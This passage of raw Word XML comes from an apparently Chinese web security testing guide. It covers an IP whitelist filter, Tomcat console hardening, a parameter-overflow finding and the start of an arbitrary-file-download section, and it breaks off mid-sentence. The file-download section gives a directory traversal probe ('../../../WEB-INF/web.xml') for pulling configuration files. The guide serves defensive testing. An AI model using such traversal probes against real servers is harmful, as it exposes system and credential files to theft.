                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web.xml</w:t>
            </w:r>
            <w:r w:rsidRPr="00215B4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件的</w:t>
            </w:r>
            <w:r w:rsidRPr="00215B4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;/web-app&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00215B4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>前增加以下内容，其中蓝色部分为需要根据实际情况配置的</w:t>
            </w:r>
            <w:r w:rsidRPr="00215B4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidRPr="00215B4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址白名单（也就是允许访问相应</w:t>
            </w:r>
            <w:r w:rsidRPr="00215B4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00215B4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>模块的客户端</w:t>
            </w:r>
            <w:r w:rsidRPr="00215B4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidRPr="00215B4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址列表），</w:t>
            </w:r>
            <w:r w:rsidRPr="00215B4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidRPr="00215B4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址间通过逗号隔开，不允许有空格；其中红色部分为需要根据实际情况配置的</w:t>
            </w:r>
            <w:r w:rsidRPr="00215B4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00215B4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>目录。参考代码：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50C65684"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lt;filter&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63F1F91E"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filter-name&gt;ClientIpFilter&lt;/filter-name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54EED4B4"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filter-class&gt;com.huawei.filters.ClientIpFilter&lt;/filter-class&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6962F14D"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init-param&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13D0171A"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param-name&gt;IPList&lt;/param-name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31130B26"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param-value&gt;192.168.1.11,192.168.2.22,10.70.107.119&lt;/param-value&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="429F8E51"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init-param&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E238746"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lastRenderedPageBreak/>
              <w:tab/>
              <w:t>&lt;/filter&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34097E11"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lt;filter-mapping&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B3632E8"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filter-name&gt;ClientIpFilter&lt;/filter-name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="194BDB3B"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url-pattern&gt;/WebService/*&lt;/url-pattern&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E261E1C"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lt;/filter-mapping&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="141E13B2" w14:textId="77777777" w:rsidR="00BD3279" w:rsidRPr="00215B4A" w:rsidRDefault="00BD3279" w:rsidP="00215B4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>修改控制台默认的用户名和名吗，并为其控制台设置强壮的口令措施，防止可被恶意或简单猜解得到用户名和密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E65081" w14:textId="77777777" w:rsidR="00BD3279" w:rsidRPr="00215B4A" w:rsidRDefault="00BD3279" w:rsidP="00215B4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器控制台的默认端口，默认路径，避免可被直接利用，访问得到地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142DC449" w14:textId="4A5105BF" w:rsidR="00757422" w:rsidRDefault="00BD3279" w:rsidP="00215B4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的修复方式：禁止别人访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主页，环境：</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">tomcat 6.0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；步骤</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：在</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Host name="localhost" appBase="webapps"</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改改</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webapps</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxxxxx</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（自己设置的路径）；步骤</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：在</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat-users.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;user name="admin" password="xxxx" roles="admin,manager" /&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改用户名和密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需强壮</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A76E0B" w14:textId="0E0FFC97" w:rsidR="00403119" w:rsidRPr="00215B4A" w:rsidRDefault="00403119" w:rsidP="00215B4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A206233" w14:textId="2A1B8EC3" w:rsidR="00757422" w:rsidRPr="00B73DD5" w:rsidRDefault="002418BC" w:rsidP="001365A8">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc498434483"/>
      <w:r w:rsidRPr="00B73DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数溢出</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="70B23D3F" w14:textId="363D2B9A"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00A15153" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者在参数中输入超长字符串，导致数据溢出，致使应用或者数据库报错引发相关信息泄露，或者引起拒绝服务攻击等问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0C5545" w14:textId="3905CC0D"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测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00782C67" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在前端可控参数中输入超长字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9E46B6" w14:textId="444F7C56" w:rsidR="00757422" w:rsidRPr="00215B4A" w:rsidRDefault="00C24790" w:rsidP="00215B4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00757422" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00331BB2" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可通过输入参数溢出触发应用服务器异常或服务器拒绝服务，影响系统可用性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020BACAE" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EC4CBB" w14:textId="3861BA05" w:rsidR="00757422" w:rsidRPr="00215B4A" w:rsidRDefault="001F2543" w:rsidP="00215B4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：超长参数导致服务器报错引发崩溃拒绝服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114E7663" w14:textId="5498CCDF" w:rsidR="00757422" w:rsidRDefault="00757422" w:rsidP="00215B4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00605BA2" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>限制输入参数内容的长度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1659D818" w14:textId="5CFA1C80" w:rsidR="00403119" w:rsidRPr="00215B4A" w:rsidRDefault="00403119" w:rsidP="00215B4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>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2918B386" w14:textId="299133C0" w:rsidR="00757422" w:rsidRPr="00B73DD5" w:rsidRDefault="002418BC" w:rsidP="001365A8">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc498434484"/>
      <w:r w:rsidRPr="00B73DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任意文件下载</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="6513D6B7" w14:textId="463B8BFE"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="0022291B" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录遍历（任意文件下载）漏洞不同于网站目录浏览，此漏洞不仅仅可遍历系统下</w:t>
      </w:r>
      <w:r w:rsidR="0022291B" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="0022291B" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的文件，而且可以浏览或者下载到系统中的文件，攻击人员通过目录遍历攻击可以获取系统文件及服务器的配置文件等等。一般来说，他们利用服务器</w:t>
      </w:r>
      <w:r w:rsidR="0022291B" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="0022291B" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、文件标准权限进行攻击。严格来说，目录遍历攻击并不是一种</w:t>
      </w:r>
      <w:r w:rsidR="0022291B" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="0022291B" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞，而是网站设计人员的设计“漏洞”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452105AB" w14:textId="77777777"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288EED99" w14:textId="77777777" w:rsidR="0065065A" w:rsidRPr="009170E6" w:rsidRDefault="0065065A" w:rsidP="009170E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描工具对网站实施扫描可能发现目录遍历或者任意文件下载漏洞，发送一系列”</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”字符来遍历高层目录，并且尝试找到系统的配置文件或者系统中存在的敏感文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE34D23" w14:textId="7AD06A96" w:rsidR="00757422" w:rsidRPr="009170E6" w:rsidRDefault="0065065A" w:rsidP="009170E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可通过判断网站语言，并根据其</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中部分提供的参数，进行构造相关的路径信息，如收集到网站中间件版本为</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则想办法构造</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>../../ WEB-INF/web.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等，然后查看其是否可被下载出来。随后可构造下载系统文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2604DB" w14:textId="5D68AFA6" w:rsidR="00757422" w:rsidRPr="009170E6" w:rsidRDefault="00C24790" w:rsidP="009170E6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00757422" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="003E5213" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidR="003E5213" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="003E5213" w:rsidRPr="009170E6">
        <w:rPr>
